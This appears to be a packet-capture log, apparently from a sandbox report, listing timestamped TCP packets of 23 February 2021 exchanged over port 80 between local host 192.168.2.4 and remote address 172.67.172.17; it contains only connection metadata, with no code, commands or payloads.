Feb 23, 2021 15:30:32.845206022 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.847737074 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.847771883 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.847883940 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.848649025 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.848684072 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.848751068 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.850374937 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.850408077 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.850511074 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.851486921 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.851511955 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.851613045 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.852113962 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.852135897 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.852204084 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.853503942 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.853526115 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.853626013 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.854528904 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.854551077 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.854649067 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.856360912 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.856385946 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.856479883 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.856837988 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.856862068 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.856949091 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.857841015 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.857882977 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.857959032 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.858757019 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.858797073 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.858864069 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.859997034 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.860025883 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.860107899 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.861125946 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.861160040 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.861222982 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.862401962 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.862431049 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.862483978 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.863401890 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.863429070 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.863548994 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.864418983 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.864440918 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.864593029 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.865402937 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.865422010 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.865753889 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.891158104 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.891206980 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.891352892 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.891468048 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.891505957 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.892148018 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.895256996 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.895292997 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.895332098 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.895359993 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.895499945 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.896583080 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.896612883 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.896752119 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.897274017 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.897311926 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.897423983 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.898236990 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.898273945 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.898363113 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.900872946 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.900897980 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.900993109 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.901237965 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.901268005 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.901354074 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.902023077 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.902049065 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.902139902 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.902786970 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.902807951 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.902901888 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.904396057 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.904418945 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.904438972 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.904474020 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.904488087 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.904539108 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.905143023 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.905168056 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.905266047 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.905873060 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.905905008 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.905987978 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.906672001 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.906698942 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.906801939 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.907452106 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.907473087 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.907567024 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.908236027 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.908262968 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.908358097 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.909023046 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.909053087 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.909138918 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.909806967 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.909832954 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.909975052 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.910556078 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.910659075 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.910969973 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.911341906 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.911360979 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.911458969 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.912091970 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.912112951 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.912235975 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.912882090 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.912900925 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.912985086 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.913638115 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.913659096 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.913723946 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.914443016 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.914484978 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.914563894 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.915195942 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.915215969 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.915296078 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.915993929 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.916014910 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.916126966 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.916732073 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.916759014 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.916908026 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.917517900 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.917540073 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.917675018 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.918291092 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.918314934 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.918411016 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.919131041 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.919148922 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.919229984 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.919820070 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.919838905 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.919939995 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.920595884 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.920614958 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.920706034 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.921416044 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.921437025 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.921531916 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.922157049 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.922174931 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.922291994 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.922924042 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.922940969 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.923012018 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.923705101 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.923723936 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.923801899 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.924494982 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.924515009 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.924634933 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.925340891 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.925374031 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.925468922 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.926024914 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.926043987 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.926116943 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.926764011 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.926780939 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.926892996 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.927553892 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.927572966 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.927660942 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.928334951 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.928356886 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.928459883 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.929100037 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.929121971 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.929214001 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.929913044 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.929943085 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.930031061 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.930665016 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.930689096 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.930789948 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.931473017 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.931502104 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.931602955 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.932254076 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.932303905 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.932996988 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.933021069 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.933052063 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.933083057 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.933867931 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.933901072 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.934004068 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.934550047 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.934572935 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.934669018 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.935297966 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.935321093 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.935410023 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.936090946 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.936114073 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.936220884 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.936861038 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.936886072 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.936989069 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.937640905 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.937665939 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.937762976 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.938429117 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.938468933 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.938568115 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.946934938 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.946973085 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.947138071 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.947386026 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.947413921 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.947554111 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.951212883 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.951246977 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.951397896 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.951534033 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.951560020 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.951668024 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.952393055 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.952429056 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.952538967 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.953110933 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.953138113 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.953252077 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.953911066 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.953938961 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.954024076 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.956614971 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.956650019 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.956932068 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.956938028 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.956959963 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.957053900 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.957729101 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.957756042 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.957844019 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.958512068 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.958540916 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.958647966 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.959882021 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.959911108 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.960011959 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.960263968 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.960319042 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.960398912 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.960952044 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.960995913 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.961091042 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.961633921 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.961658955 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.961754084 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.962359905 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.962389946 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.962486982 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.963119984 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.963145971 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.963243961 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.963722944 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.963747978 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.963890076 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.964448929 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.964476109 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.964569092 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.965116024 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.965143919 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.965245962 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.965790987 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.965821028 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.965909958 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.966490984 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.966521978 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.966609955 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.967159986 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.967190027 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.967278004 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.967992067 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.968069077 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.968508005 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.968554020 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.968600035 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.968660116 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.969144106 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.969186068 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.969264984 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.969293118 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.970187902 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.970259905 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.970302105 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.970377922 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.970407963 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.971098900 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.971143007 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.971219063 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.971247911 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.972059011 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.972193956 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.972243071 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.972291946 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.972368956 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.973016977 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.973061085 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.973098993 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.973146915 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.973881960 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.973932981 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.973963022 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.973977089 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.974267006 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.974807024 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.974848986 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.974889040 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.974963903 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.975692987 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.975735903 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.975774050 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.975781918 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.975831985 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.976615906 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.976660967 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.976699114 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.976743937 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.977478027 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.977529049 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.977581024 CET	49737	80	192.168.2.4	172.67.172.17
